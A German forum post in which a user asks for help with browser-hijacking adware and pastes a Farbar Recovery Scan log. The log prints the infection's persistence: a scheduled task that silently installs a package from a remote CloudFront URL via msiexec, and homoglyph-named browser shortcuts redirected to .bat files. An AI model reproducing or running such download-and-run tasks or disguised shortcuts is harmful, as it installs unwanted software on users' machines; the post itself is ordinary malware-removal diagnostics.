Windows 7 Internet Explorer leitet mich auf Systembooster Homepage Firefox auf SI-Viewer

MBJPaul · 18.05.2017, 16:52

Hallo,
ich habe mir etwas eingefangen obwohl ich Avira, NoScript und Spyboot aktiv nutze.

Nach dem Start von Firefox wird nicht Google als Suchmaschine, sondern der siviewer verwendet. Kann man immer wieder zurückstellen ist aber nervig. Im Internet Explorer werde ich auf eine Seite "Systembooster" umgeleitet. Habe danach die Emsisoft Anti Malware installiert, aber die Probleme bleiben bestehen.

Avira hat Adware/ELEX und TR/ADLOAD und TR/Obfuscate gefunden.

Ich hoffe das mir hier jemand helfen kann.

Dafür schon mal vorab ein großes DANKE.

Gruß
Markus

Hier der Log File aus AviraFRST Additions Logfile:

Code:

ATTFilter

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 14-05-2017
durchgeführt von Markus (18-05-2017 17:25:30)
Gestartet von C:\Users\Markus\Downloads
Windows 7 Professional Service Pack 1 (X64) (2012-11-07 08:08:14)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3526156030-524322557-4044303751-500 - Administrator - Disabled)
Gast (S-1-5-21-3526156030-524322557-4044303751-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3526156030-524322557-4044303751-1003 - Limited - Enabled)
Markus (S-1-5-21-3526156030-524322557-4044303751-1001 - Administrator - Enabled) => C:\Users\Markus

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Antivirus (Enabled - Up to date) {B3F630BD-538D-1B4A-14FA-14B63235278F}
AV: Emsisoft Anti-Malware (Enabled - Up to date) {701CB209-EBBC-AADC-11E6-DE73E7AF4C9D}
AS: Spybot - Search and Destroy (Enabled - Up to date) {A16C3F68-9280-E053-1818-342707FECF4D}
AS: Emsisoft Anti-Malware (Enabled - Up to date) {CB7D53ED-CD86-A552-2B56-E5019C280620}
AS: Avira Antivirus (Enabled - Up to date) {0897D159-75B7-14C4-2E4A-2FC449B26D32}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

64 Bit HP CIO Components Installer (Version: 8.2.4 - Hewlett-Packard) Hidden
AAVUpdateManager (HKLM-x32\...\{AFA42FE1-A5C3-485F-9180-BFCF5BF1F1C3}) (Version: 18.00.0000 - Wolters Kluwer Deutschland GmbH)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.26.48 - Avira Operations GmbH & Co. KG)
Avira Connect (HKLM-x32\...\{897e4d08-9554-48e9-ba07-ce6040867fa3}) (Version: 1.2.83.46341 - Avira Operations GmbH & Co. KG)
Avira Connect (x32 Version: 1.2.83.46341 - Avira Operations GmbH & Co. KG) Hidden
Avira Secure Backup (HKLM\...\Avira Secure Backup) (Version: 1.0.0 - Avira Secure Backup)
CANON iMAGE GATEWAY MyCamera Download Plugin (HKLM-x32\...\MyCamera Download Plugin) (Version: 3.1.0.1 - Canon Inc.)
CANON iMAGE GATEWAY Task for ZoomBrowser EX (HKLM-x32\...\CANON iMAGE GATEWAY Task) (Version: 1.8.0.1 - Canon Inc.)
Canon Internet Library for ZoomBrowser EX (HKLM-x32\...\Canon Internet Library for ZoomBrowser EX) (Version: 1.7.0.1 - Canon Inc.)
Canon MOV Decoder (HKLM-x32\...\Canon MOV Decoder) (Version: 1.7.0.6 - Canon Inc.)
Canon MOV Encoder (HKLM-x32\...\Canon MOV Encoder) (Version: 1.5.0.3 - Canon Inc.)
Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\MovieEditTask) (Version: 3.6.0.5 - Canon Inc.)
Canon RAW Codec (HKLM-x32\...\Canon RAW Codec) (Version: 1.8.0.68 - Canon Inc.)
Canon Utilities Digital Photo Professional 3.9 (HKLM-x32\...\DPP) (Version: 3.9.1.0 - Canon Inc.)
Canon Utilities EOS Utility (HKLM-x32\...\EOS Utility) (Version: 2.9.0.0 - Canon Inc.)
Canon Utilities PhotoStitch (HKLM-x32\...\PhotoStitch) (Version: 3.1.22.46 - Canon Inc.)
Canon Utilities Picture Style Editor (HKLM-x32\...\Picture Style Editor) (Version: 1.8.0.0 - Canon Inc.)
Canon Utilities WFT Utility (HKLM-x32\...\WFTK) (Version: 3.5.1.1 - Canon Inc.)
Canon Utilities ZoomBrowser EX (HKLM-x32\...\ZoomBrowser EX) (Version: 6.6.0.23 - Canon Inc.)
Canon ZoomBrowser EX Memory Card Utility (HKLM-x32\...\ZoomBrowser EX Memory Card Utility) (Version: 1.4.0.4 - Canon Inc.)
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
Contrôle ActiveX Windows Live Mesh pour connexions à distance (HKLM-x32\...\{55D003F4-9599-44BF-BA9E-95D060730DD3}) (Version: 15.4.5722.2 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
EDEKA Foto (HKLM-x32\...\EDEKA Foto) (Version: 5.1.6 - CEWE Stiftung u Co. KGaA)
Emsisoft Anti-Malware (HKLM\...\{5502032C-88C1-4303-99FE-B5CBD7684CEA}_is1) (Version: 2017.4 - Emsisoft Ltd.)
Eusing Free Registry Cleaner (HKLM-x32\...\Eusing Free Registry Cleaner) (Version:  - Eusing Software)
FJ Camera (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.52032.0_WHQL - Sonix)
FreePDF (Remove only) (HKLM-x32\...\FreePDF_XP) (Version:  - )
Fujitsu Hotkey Utility (HKLM-x32\...\InstallShield_{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED)
Fujitsu Hotkey Utility (x32 Version: 3.70.0.0 - FUJITSU LIMITED) Hidden
Fujitsu MobilityCenter Extension Utility (HKLM-x32\...\InstallShield_{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 3.01.00.002 - FUJITSU LIMITED)
Fujitsu MobilityCenter Extension Utility (Version: 3.01.00.002 - FUJITSU LIMITED) Hidden
Fujitsu System Extension Utility (HKLM-x32\...\InstallShield_{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED)
Fujitsu System Extension Utility (Version: 3.4.4.0 - FUJITSU LIMITED) Hidden
Galería fotográfica de Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
GPL Ghostscript (HKLM-x32\...\GPL Ghostscript 9.04) (Version: 9.04 - Artifex Software Inc.)
High-Definition Video Playback (x32 Version: 7.1.13900.47.0 - Nero AG) Hidden
HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP LaserJet 200 color MFP M276 (HKLM-x32\...\{CC38C23C-7824-4DBB-AC73-997CD0BBFEC7}) (Version: 5.0.12201.1116 - Hewlett-Packard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.9572 - HP)
hpbDSService (x32 Version: 002.002.07399 - Hewlett-Packard) Hidden
hpbM276DSService (x32 Version: 001.001.05874 - Hewlett-Packard) Hidden
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
HPDXP (x32 Version: 3.0.26.8 - HP) Hidden
HPLaserJet200color-MFPM276_HelpLearnCenter_SI (HKLM-x32\...\{0F044C7A-6EE1-4F03-90AC-329AAF2FCF12}) (Version: 1.01.0000 - Hewlett-Packard)
HPLJDXPHelper (x32 Version: 020.021.004 - HP) Hidden
HPLJUTCore (x32 Version: 004.005.0001 - HP) Hidden
HPLJUTM276 (x32 Version: 3.00.0003 - HP) Hidden
hppFaxDrvM276 (x32 Version: 003.000.00002 - Hewlett-Packard) Hidden
hppLaserJetService (x32 Version: 009.027.00856 - Hewlett-Packard) Hidden
hppM276LaserJetService (x32 Version: 001.019.00639 - Hewlett-Packard) Hidden
hppSendFaxM276 (x32 Version: 003.000.00002 - Hewlett-Packard) Hidden
hpStatusAlerts (x32 Version: 050.037.00142 - Hewlett Packard) Hidden
hpStatusAlertsM276 (x32 Version: 050.034.00131 - Hewlett-Packard) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.0.1351 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2626 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.3.214 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{DF7756DD-656A-45C3-BA71-74673E8259A9}) (Version: 15.00.0000.0642 - Intel Corporation)
Intel® Trusted Connect Service Client (HKLM\...\{6199B534-A1B6-46ED-873B-97B0ECF8F81E}) (Version: 1.23.216.0 - Intel Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lexware buchhalter 2014 (x32 Version: 19.02.00.0181 - Haufe-Lexware GmbH & Co.KG) Hidden
Lexware online banking (x32 Version: 20.00.00.0059 - Haufe-Lexware GmbH Co.KG) Hidden
LIFEBOOK Application Panel (HKLM-x32\...\InstallShield_{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED)
LIFEBOOK Application Panel (Version: 8.3.2.0 - FUJITSU LIMITED) Hidden
LJDXPHelperUI (x32 Version: 020.021.004 - HP) Hidden
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.6.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB  (HKLM\...\{E4A1FDA3-689D-44DA-9B39-86BD2270F522}) (Version: 11.2.5058.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Management Objects  (x64) (HKLM\...\{43A5C316-9521-49C3-B9B6-FCE5E1005DF0}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (x64) (HKLM\...\{99AC7F47-A4E0-4706-9C65-8948775C2652}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{6AFCA4E1-9B78-3640-8F72-A7BF33448200}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{90ffcee5-8608-4e94-8c18-a4feb4f83fb8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 53.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0 (x86 de)) (Version: 53.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0 - Mozilla)
Mp3tag v2.75 (HKLM-x32\...\Mp3tag) (Version: v2.75 - Florian Heidenreich)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.6 - F.J. Wechselberger)
Nero 10 Movie ThemePack 1 (HKLM-x32\...\{43FBAB46-5969-4200-9958-1FF81FEE506F}) (Version: 10.2.10000.11.0 - Nero AG)
Nero BurnRights 10 (HKLM-x32\...\{943CFD7D-5336-47AF-9418-E02473A5A517}) (Version: 4.2.10500.1.102 - Nero AG)
Nero CoverDesigner 10 (HKLM-x32\...\{FCF00A6E-FB58-477A-ABE9-232907105521}) (Version: 5.2.11400.11.100 - Nero AG)
Nero DiscSpeed 10 (HKLM-x32\...\{34490F4E-48D0-492E-8249-B48BECF0537C}) (Version: 6.2.10500.2.100 - Nero AG)
Nero Express 10 (HKLM-x32\...\{70550193-1C22-445C-8FA4-564E155DB1A7}) (Version: 10.2.11900.20.100 - Nero AG)
Nero InfoTool 10 (HKLM-x32\...\{F412B4AF-388C-4FF5-9B2F-33DB1C536953}) (Version: 7.2.10400.5.100 - Nero AG)
Nero MediaHub 10 (HKLM-x32\...\{1F7FB68F-52F6-46A3-B42F-38CE46295AE5}) (Version: 1.2.13200.33.100 - Nero AG)
Nero Multimedia Suite 10 Essentials (HKLM-x32\...\{ADEF1F0B-635E-4041-B50F-A510C1B4D2C5}) (Version: 10.5.10400 - Nero AG)
Nero RescueAgent 10 (HKLM-x32\...\{E337E787-CF61-4B7B-B84F-509202A54023}) (Version: 3.2.10800.9.100 - Nero AG)
Nero StartSmart 10 (HKLM-x32\...\{F61D489E-6C44-49AC-AD02-7DA8ACA73A65}) (Version: 10.2.11600.14.100 - Nero AG)
Nero Update (HKLM-x32\...\{65BB0407-4CC8-4DC7-952E-3EEFDF05602A}) (Version: 1.0.0018 - Nero AG)
NVIDIA 3D Vision Treiber 361.91 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 361.91 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.9.1.22 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.9.1.22 - NVIDIA Corporation)
NVIDIA Grafiktreiber 361.91 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 361.91 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Paint.NET v3.5.10 (HKLM\...\{529125EF-E3AC-4B74-97E6-F688A7C0F1C0}) (Version: 3.60.0 - dotPDN LLC)
PDF Architect (HKLM-x32\...\{064A929A-4DE8-40CF-A901-BD40C14E4D25}) (Version: 1.1.83.9982 - pdfforge GmbH)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.7.1 - pdfforge)
Plugfree NETWORK (HKLM\...\{7BA64D21-EE46-4a9a-8145-52B0175C3F86}) (Version: 6.2.0.1 - FUJITSU LIMITED)
Plugfree NETWORK (Version: 6.2.001 - FUJITSU LIMITED) Hidden
Power Saving Utility (HKLM-x32\...\{49A588CF-5FD4-4774-BFBF-0764287DE82B}) (Version: 32.01.10.038 - FUJITSU LIMITED)
QuickSteuer Deluxe 2016 (HKLM-x32\...\{3077FB33-83B4-4B16-9A35-CD160CD3D012}) (Version: 21.33.90 - Haufe-Lexware GmbH & Co.KG)
QuickSteuer Deluxe 2017 (HKLM-x32\...\{BC0423F1-44FC-43B2-BC77-ED912E75D64F}) (Version: 22.30.70 - Haufe-Lexware GmbH & Co.KG)
Raccolta foto di Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6526 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30129 - Realtek Semiconductor Corp.)
RedMon - Redirection Port Monitor (HKLM\...\Redirection Port Monitor) (Version:  - )
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
SHIELD Streaming (Version: 4.1.0260 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.9.1.22 - NVIDIA Corporation) Hidden
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.30 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.30.105 - Skype Technologies S.A.)
Smart Cutter (HKLM-x32\...\{828FFE22-A27D-4891-BF79-CE78C9E1F478}) (Version: 1.8.1 - FameRing)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.19.1 - Synaptics Incorporated)
tiptoi® Manager 3.0.9 (HKLM-x32\...\9978-5763-2995-5228) (Version: 3.0.9 - Ravensburger AG)
Update for PDF Writer (HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\DigitalSite) (Version:  - ) <==== ACHTUNG
WIDCOMM Bluetooth Software (HKLM\...\{6E7F4CA3-B2DE-413C-A7A1-43AA5BE19EA1}) (Version: 6.5.0.3100 - Broadcom Corporation)
Windows Installer Clean Up (HKLM-x32\...\{121634B0-2F4B-11D3-ADA3-00C04F52DD52}) (Version: 3.00.00.0000 - Microsoft Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh - ActiveX-besturingselement voor externe verbindingen (HKLM-x32\...\{C32CE55C-12BA-4951-8797-0967FDEF556F}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Mesh ActiveX control for remote connections (HKLM-x32\...\{C5398A89-516C-4DAF-BA07-EE7949090E56}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{C63A1E60-B6A4-440B-89A5-1FC6E4AC1C94}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\ChromeHTML: -> "C:\Program Files (x86)\Boxbob\Application\chrome.exe" "%1" <==== ACHTUNG

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {09684BE9-6801-4ACC-A441-372E5344685D} - System32\Tasks\{FD46ED85-54A0-43DF-9695-7871B128BD8A} => pcalua.exe -a C:\Users\Markus\Downloads\msicuu2.exe -d C:\Users\Markus\Downloads
Task: {18C0FF31-C5C7-4CA8-BDEF-E6855B0DD134} - System32\Tasks\Microsoft\Windows\Media Center\VCore => C:\ProgramData\vCore\VCore.exe [2016-11-10] () <==== ACHTUNG
Task: {235BC95F-90C6-4A38-A70A-AE3C9F5D5481} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2016-03-21] (Safer-Networking Ltd.)
Task: {5CBA789E-743C-4F3C-BBB6-889D39EDF9BC} - System32\Tasks\Jujalyclartion Launcher => C:\Program Files (x86)\Prodak\xplidack.exe 
Task: {63450DF1-2C0B-428E-BFAC-EC1022663B86} - System32\Tasks\HPLJCustParticipation => C:\Program Files (x86)\HP\HPLJUT\HPLJUTSCH.exe [2012-06-14] (Hewlett Packard)
Task: {7A2D82DC-B977-42C6-B06F-305C2A0FCC4B} - \Samsung Update -> Keine Datei <==== ACHTUNG
Task: {9E499590-0B71-46E5-A0D1-7999EF821021} - System32\Tasks\Fujitsu\DeskUpdate => c:\Fujitsu\Programs\DeskUpdate\ducmd.exe [2015-06-15] (Fujitsu Technology Solutions)
Task: {A5F517D2-8E40-4B4D-BE10-8FA4B3FC7737} - \DigitalSite -> Keine Datei <==== ACHTUNG
Task: {AF87EE5A-0FFE-4949-B2EC-5914C44C1F2C} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe 
Task: {B28FBEA4-57C7-46AC-99F4-93A8B224A578} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe 
Task: {B63B338D-2191-45D3-814B-CD40E4AF8882} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2016-03-21] (Safer-Networking Ltd.)
Task: {B6CEEF38-5E00-4EAF-B77C-A1ABBD8D451B} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2013-09-20] (Safer-Networking Ltd.)
Task: {BD8FF9A2-1BE8-4462-B889-1D0245A1B4C5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {BE571A95-F9AD-46C2-93D0-C2AE61480FCE} - System32\Tasks\Plirisy => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=IntensoXXSSDXSataXIII_AA000000000000003571&amp;d=20170420 /q <==== ACHTUNG
Task: {C5822879-831F-43BA-A61F-5B932F493306} - \Scheduled Update for Ask Toolbar -> Keine Datei <==== ACHTUNG
Task: {C5AA2588-EC43-4B8A-B1E4-C59182E532A7} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-13] (Adobe Systems Incorporated)
Task: {EBC15A2C-025C-4ECA-98E9-4C78CF03571E} - \Windows-PG -> Keine Datei <==== ACHTUNG
Task: {FE5E5492-AD3E-49DF-A90E-C79C6B325289} - \Milimili -> Keine Datei <==== ACHTUNG

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnet Explorеr.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat ()
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехplorеr (Nо Add-оns).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat ()
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gооgle Сhrоmе.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.emorhc.bat ()
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnet Ехрlоrеr Вrowser.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat ()
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnet Explorеr.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat ()
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnet Eхplorеr (3).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat ()
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Еxрlorеr (2).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat ()
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzilla Firefоx.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.xoferif.bat ()
Shortcut: C:\Users\Public\Desktop\ZооmВrоwsеr EХ.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.resworbmooz.bat ()

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2013-10-27 09:03 - 2016-02-09 10:39 - 00020536 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2012-11-07 06:17 - 2016-02-09 07:41 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2013-03-27 22:39 - 2010-06-17 21:56 - 00087040 _____ () C:\Windows\System32\redmonnt.dll
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2013-11-06 12:58 - 2013-11-06 12:58 - 02048000 _____ () C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll
2008-10-24 17:35 - 2008-10-24 17:35 - 00128296 _____ () C:\Program Files (x86)\Lexware\AAVUpdateManager\aavus.exe
